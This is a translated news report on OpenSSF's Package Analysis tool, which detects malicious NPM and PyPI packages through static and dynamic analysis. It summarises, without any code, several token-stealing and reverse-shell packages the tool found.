The OpenSSF (Open Source Security Foundation), formed by the Linux Foundation and aimed at improving the security of open source software, presented an open project called Package Analysis, which develops a system for analyzing the presence of malicious code in packages. The project code is written in Go and distributed under the Apache 2.0 license. Pre-scanning of NPM and PyPI repositories using the proposed toolkit revealed more than 200 previously undetected malicious packages.
The main part of the identified problematic packages manipulates the intersection of names with internal non-public project dependencies (dependency confusion attack) or uses typesquatting methods (assigning names similar to the names of popular libraries), and also calls scripts during the installation process that access external hosts. According to the Package Analysis developers, most of the identified problematic packages are most likely created by security researchers participating in bug bounty programs, since the data sent is limited to the user and system name, and the actions are performed explicitly, without trying to hide their behavior .
Of the packages with malicious activity, the following are noted:
- PyPI package discordcmd, which fixes sending atypical requests to raw.githubusercontent.com, Discord API and ipinfo.io. The specified package downloaded the backdoor code from GitHub and installed it in the Windows Discord client directory, after which it started the process of searching for Discord tokens in the file system and sending them to an external Discord server controlled by the attackers.
- The colorsss NPM package, which also tried to send tokens from a Discord account to an external server.
- @roku-web-core/ajax NPM package - during the installation process, sent system information and launched a handler (reverse shell) that accepts external connections and runs commands.
- PyPI package secrevthree - Launched a reverse shell when a specific module was imported.
- NPM package random-vouchercode-generator - after importing the library, it sent a request to an external server, which returned the command and the time at which it needs to be run.
The job of Package Analysis is to analyze in source code packages of code to establish network connections, access files, and run commands. Additionally, changes in the state of packages are monitored to determine the addition of malicious inserts in one of the releases of initially harmless software. To monitor the appearance of new packages in repositories and make changes to previously placed packages, the Package Feeds toolkit is used, which unifies work with NPM, PyPI, Go, RubyGems, Packagist, NuGet and Crate repositories.
Package Analysis includes three basic components that can be used both in conjunction and separately:
- Scheduler for launching package analysis jobs based on data from Package Feeds.
- An analyzer that directly examines a packet and evaluates its behavior using static analysis and dynamic tracing methods. The check is carried out in an isolated environment.
- Uploader that puts the results of the check into the BigQuery storage.
Source: opennet.ru